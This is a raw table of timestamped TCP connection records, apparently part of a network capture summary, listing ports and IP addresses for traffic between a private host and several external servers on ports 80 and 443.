Nov 2, 2024 17:56:27.211985111 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.211997032 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212037086 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.212127924 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212141037 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212176085 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.212202072 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.212500095 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212512970 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212524891 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212537050 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212546110 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.212564945 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.212596893 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.212711096 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212723970 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212734938 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.212764978 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.212788105 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.251513958 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.251526117 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.251538038 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.251580954 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.251621962 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.259855032 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.259876966 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.259887934 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.259917974 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.259932995 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.303540945 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303622961 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303632021 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303643942 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.303663969 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303700924 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.303705931 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303733110 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.303761959 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.303774118 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303786039 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303797960 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.303817034 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.303842068 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.304037094 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.304079056 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.304109097 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.304147005 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.304166079 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.304177999 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.304188967 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.304208994 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.304239988 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.304307938 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:27.304351091 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:27.342329025 CET	443	49717	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.342744112 CET	49717	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.342771053 CET	443	49717	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.343208075 CET	49717	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.343214989 CET	443	49717	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.478287935 CET	443	49717	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.478549957 CET	443	49717	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.478631020 CET	49717	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.478681087 CET	49717	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.478701115 CET	443	49717	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.478714943 CET	49717	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.478724957 CET	443	49717	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.481409073 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.481496096 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.481596947 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.481805086 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.481822014 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.614077091 CET	443	49719	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.614963055 CET	49719	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.614983082 CET	443	49719	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.615691900 CET	49719	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.615700006 CET	443	49719	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.637164116 CET	443	49718	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.642184019 CET	49718	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.642219067 CET	443	49718	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.642643929 CET	49718	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.642648935 CET	443	49718	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.659637928 CET	443	49720	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.660052061 CET	49720	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.660079002 CET	443	49720	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.660538912 CET	49720	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.660543919 CET	443	49720	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.710675001 CET	443	49721	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.711847067 CET	49721	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.711865902 CET	443	49721	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.712676048 CET	49721	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.712681055 CET	443	49721	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.744430065 CET	443	49719	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.744543076 CET	443	49719	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.744609118 CET	49719	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.745069027 CET	49719	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.745091915 CET	443	49719	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.745107889 CET	49719	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.745115995 CET	443	49719	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.767852068 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.767888069 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.767947912 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.769082069 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.769100904 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.773236990 CET	443	49718	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.773387909 CET	443	49718	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.773437023 CET	49718	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.774168968 CET	49718	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.774189949 CET	443	49718	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.774199009 CET	49718	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.774204016 CET	443	49718	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.783970118 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.784006119 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.784137011 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.785473108 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.785489082 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.793179035 CET	443	49720	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.793674946 CET	443	49720	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.793730974 CET	49720	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.793776035 CET	49720	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.793791056 CET	443	49720	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.793802023 CET	49720	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.793807983 CET	443	49720	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.795978069 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.796017885 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.796082973 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.796240091 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.796257973 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.844134092 CET	443	49721	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.844484091 CET	443	49721	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.844531059 CET	49721	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.844614029 CET	49721	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.844634056 CET	443	49721	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.844646931 CET	49721	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.844652891 CET	443	49721	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.847424984 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.847467899 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:27.847539902 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.847872972 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:27.847886086 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.231303930 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.236856937 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.236881971 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.237690926 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.237696886 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.365431070 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.365499973 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.365556002 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.495376110 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.495408058 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.495421886 CET	49722	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.495428085 CET	443	49722	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.519535065 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.533427000 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.543428898 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.562511921 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.578142881 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.590301037 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.594409943 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.640644073 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.888868093 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.888890028 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.889605045 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.889612913 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.889921904 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.889941931 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.890314102 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.890321016 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.950372934 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.950393915 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:28.950993061 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:28.950998068 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.017512083 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.017592907 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.017643929 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.017777920 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.017986059 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.018038034 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.079623938 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.079691887 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.079852104 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.100986004 CET	80	49700	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:29.101082087 CET	49700	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:29.221545935 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.221601963 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.222456932 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.222472906 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.222906113 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.222935915 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.222949982 CET	49724	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.222958088 CET	443	49724	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.353380919 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.353473902 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.353640079 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.419114113 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.419142962 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.419156075 CET	49725	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.419162989 CET	443	49725	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.421749115 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.421749115 CET	49726	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.421781063 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.421792984 CET	443	49726	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.431241035 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.431266069 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.431279898 CET	49723	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.431287050 CET	443	49723	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.583905935 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.583946943 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.584011078 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.604957104 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.604965925 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.621918917 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.621921062 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.621933937 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.621958971 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.622004986 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.622241020 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.622737885 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.622746944 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.622805119 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.623164892 CET	49731	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.623181105 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.623234034 CET	49731	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.623328924 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.623339891 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.623452902 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.623462915 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.623471975 CET	49731	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.623486042 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.623811007 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:29.623817921 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:29.907779932 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:29.907838106 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:29.907943010 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:29.928765059 CET	49737	443	192.168.2.7	4.175.87.197
Nov 2, 2024 17:56:29.928793907 CET	443	49737	4.175.87.197	192.168.2.7
Nov 2, 2024 17:56:29.940150023 CET	49738	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:29.940195084 CET	443	49738	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:29.940494061 CET	49738	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:29.941009045 CET	49738	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:29.941021919 CET	443	49738	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.359335899 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.360410929 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.360426903 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.361254930 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.361260891 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.368558884 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.389498949 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.389520884 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.390088081 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.390101910 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.393889904 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.394718885 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.394733906 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.395335913 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.395344019 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.396531105 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.397094011 CET	49731	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.397103071 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.397753000 CET	49731	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.397759914 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.400516987 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.400939941 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.400963068 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.401453018 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.401458979 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.492336988 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.492410898 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.492583036 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.492696047 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.492697001 CET	49728	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.492716074 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.492728949 CET	443	49728	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.495620012 CET	49739	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.495678902 CET	443	49739	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.495760918 CET	49739	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.495913982 CET	49739	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.495929956 CET	443	49739	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.517906904 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.517978907 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.518029928 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.519001007 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.519001007 CET	49730	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.519009113 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.519016027 CET	443	49730	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.522017002 CET	49740	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.522073984 CET	443	49740	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.522286892 CET	49740	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.522341967 CET	49740	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.522365093 CET	443	49740	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.531336069 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.531402111 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.531563044 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.531661034 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.532316923 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.532335043 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.532366037 CET	49729	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.532372952 CET	443	49729	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.532474041 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.532830000 CET	49731	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.534388065 CET	49731	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.534398079 CET	443	49731	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.534948111 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.534974098 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.535041094 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.535675049 CET	49741	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.535686016 CET	443	49741	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.536818027 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.536880970 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.536943913 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.537383080 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.537383080 CET	49727	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.537390947 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.537399054 CET	443	49727	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.538954020 CET	49742	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.538988113 CET	443	49742	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.539052010 CET	49742	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.539216995 CET	49742	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.539231062 CET	443	49742	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.540123940 CET	49743	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.540159941 CET	443	49743	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.540210962 CET	49744	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.540230989 CET	443	49744	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.540255070 CET	49743	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.540271997 CET	49744	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.540368080 CET	49743	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.540383101 CET	443	49743	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.540401936 CET	49744	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:30.540415049 CET	443	49744	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:30.596046925 CET	49745	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.596100092 CET	443	49745	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.596169949 CET	49745	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.596452951 CET	49745	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.596474886 CET	443	49745	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.719193935 CET	49746	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.719225883 CET	443	49746	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.719485044 CET	49746	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.720241070 CET	49746	443	192.168.2.7	142.250.186.132
Nov 2, 2024 17:56:30.720253944 CET	443	49746	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.802894115 CET	443	49738	142.250.186.132	192.168.2.7
Nov 2, 2024 17:56:30.803181887 CET	49738	443	192.168.2.7	142.250.186.132
